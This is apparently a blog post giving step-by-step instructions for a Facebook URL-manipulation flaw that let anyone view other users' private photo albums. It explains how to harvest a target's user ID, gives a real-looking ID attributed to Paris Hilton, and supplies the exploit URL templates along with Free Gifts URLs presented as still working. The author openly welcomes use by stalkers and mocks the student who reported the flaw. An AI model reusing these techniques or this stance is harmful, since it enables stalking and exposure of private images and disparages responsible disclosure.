Who's Byron Ng? A total tool, that's who. He's the one who ran a few Google searches and tipped off the Associated Press about a Facebook exploit that's been passing around the 'net for months now. The AP picked up the story and put it in every newspaper under the sun, making him a minor campus celebrity who's now forever disinvited to Facebook Club. It also tippped off Facebook to what was going on, and the company was quick to plug the exploit.

Thanks a lot, man.

But for all the press I've been seeing about this crazy hack that's destroying the privacy of millions--by letting everyone in the world peer into the secret debauchery of important facebook users like Paris Hilton--I haven't seen a single news story that actually tells you what happened. Or how to even go about "exploiting" Facebook's security issues. For starters, the trick was a lot easier than you might think, requiring very little effort on the "hacking" end of things and a decent amount of know-how on the "ingenuity" side of the equation.

The Setup

First, you had to find the ID number of your target. Facebook assigns each user an individual ID number, perhaps a mistake on the service's part. When you're viewing your own profile, this is the huge string of numerals that comes after the "profile.php?id=" part of the URL. Same deal when you're viewing a friend's profile.

So how, then, do you acquire the ID number of a person who isn't your friend? If they haven't privacy-blocked your ability to see their profile, it's as easy as looking them up using a simple Facebook search and clicking through to the profile. Check the URL, and you'll find the ID number.

If your target has privacy-locked their page, the situation gets a little more complicated. In Paris Hilton's case, she's made it so you can only send her a message if you aren't her friend. But in that, you can pull the ID number. Check out the URL Facebook generates for Ms. Hilton's "send message" link. I'll underline her ID number:

http://www.facebook.com/search_redirect.php?q=paris,hilton&fc=0&gc=3613
&cl=300&rc=4073&rank=4&friends=0&sns=0&k=400000000010&t=1&u=
http://www.facebook.com/inbox/?compose&id=1118869250&k=400000000010

See? As long as Facebook allows you to interact with a person in some capacity, you can pull their ID number. This even works for people who have blocked you off the service, just as long as you've retained some level of correspondence--say, a Facebook message (use Facebook's Report Message link to pull the ID on this one).

Keep this little trick in mind, because when the next Facebook exploit hits, it'll surely make use of the service's ID numbers as the basis for the hack. In fact, you can already use ID numbers on Facebook applications to see things you shouldn't--for example, any Free Gifts (and accompanying messages) a person has sent to or received from anyone else using the application, regardless if you're friends (or blocking) the original target. Use one of these URLs:

http://apps.facebook.com/freegifts/?to=[[ID NUMBER]]
http://apps.facebook.com/freegifts/?from=[[ID NUMBER]]

The Hammer

Once you had the Facebook ID number, the exploit itself was easy enough to navigate. Facebook used to delineate the URLs for photographs as such:

http://www.facebook.com/photo.php?pid=[[THE PICTURE'S ID]]
&op=1&view=all&subj=[[ID NUMBER OF SOMEONE TAGGED IN THE PHOTO]]
&id=[[ID NUMBER OF ALBUM'S OWNER]]

The bracketed portions are the parts that change depending on what you're looking at. The Picture ID is the number Facebook assigns, sequentially, to images uploaded to its service. The subj= ID number is, as the description suggests, the ID number of a person tagged in the particular photo. And the ID number of the album's owner, well... we'll just leave it at that.

Normally, when you click on a "show me more pictures from x" user link, it would look like this: the picture ID would be unique, the subj= part would be the person's ID, and the ID number of the album's owner would populate that field. The Facebook exploit worked as follows: you'd start by entering a random nine-digit number for the picture ID section. You'd use your target's ID number for the "someone tagged in the photo" part, and reuse that same ID for the album's owner section.

This little trick never got you results on the first shot, but that's ok; the point of the URL manipulation was to acquire a correct photo ID. In this case, Facebook would return you an error message saying that the page could not be found, but it would also autocorrect the pid= part to reflect the photograph the target was last tagged in. From there, you'd take the given URL and delete the entire &id= portion, leaving just &subj=####### as the end of the URL. Hit enter, and voila! Instant access to the last photograph the target was tagged in, and access to the entire album of pictures from which that one image resides, whether you're the friend of the individual who created it or not.

An error? Hardly. Seeing this screen meant you were but one step away from private pictures galore!

A similar trick worked to access the last photo the target tagged of him/herself. These tricks didn't exactly break the dam of Facebook privacy, but it did give industrious users--and stalkers--a means to check up on what anyone's doing at any time, only dependant on one's tenacity and zest for URL refreshing. But thanks to Byron, who clearly felt the need to let the world that He and He alone found this industrious exploit, we will no longer be able to catch up on what our favorite internet celebrities are up to. Sigh.

You, sir, owe the Web 2.0 an apology.

Hey!

We've done some more research and found a few more facebook exploits! Hi to all the Digg users who are keeping up with this!

COMMENTS:

6

TAGS: 

Security, photo, news, facebook, how_to, exploit, hack, nude

Comments Print Email